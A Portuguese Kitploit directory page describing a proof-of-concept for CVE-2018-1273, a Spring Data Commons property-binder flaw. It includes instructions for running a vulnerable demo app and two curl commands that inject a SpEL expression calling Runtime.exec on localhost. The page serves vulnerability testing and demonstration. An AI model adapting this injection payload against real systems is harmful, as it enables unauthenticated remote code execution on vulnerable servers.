Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
poc-cve-2018-1273 — Exploit de prova de conceito para CVE-2018-1273, uma vulnerabilidade no binder de propriedades do Spring Data Commons que leva à execução remota de código por meio de parâmetros de requisição HTTP maliciosamente elaborados. | Kitploit
Ferramentas/GitHubGitHub/webr0ck/poc-cve-2018-1273
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubwebr0ck/poc-cve-2018-1273

poc-cve-2018-1273

Exploit de prova de conceito para CVE-2018-1273, uma vulnerabilidade no binder de propriedades do Spring Data Commons que leva à execução remota de código por meio de parâmetros de requisição HTTP maliciosamente elaborados.

Ver Repositório
23há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-1273

Spring Data Commons, versões anteriores a 1.13 a 1.13.10, 2.0 a 2.0.5 e versões antigas não suportadas, contêm uma vulnerabilidade de property binder causada pela neutralização inadequada de elementos especiais. Um usuário malicioso remoto não autenticado (ou atacante) pode fornecer parâmetros de requisição especialmente criados contra recursos HTTP suportados pelo Spring Data REST ou usando a vinculação de payload de requisição baseada em projeção do Spring Data, o que pode levar a um ataque de execução remota de código.

Mais informações aqui

Execução

A aplicação pode ser testada com a versão vulnerável ou a versão corrigida do Spring Data Commons.

  • Versão vulnerável (padrão):
root@kitploit:~
mvn spring-boot:run
  • Versão corrigida:
root@kitploit:~
mvn spring-boot:run -Dfixed

Testando a vulnerabilidade

Execute o seguinte comando para verificar se a vulnerabilidade pode ser explorada:

  • No Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • No macOS:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Créditos

Criado por https://www.arima.eu

ARIMA Software Design

Baixar ferramenta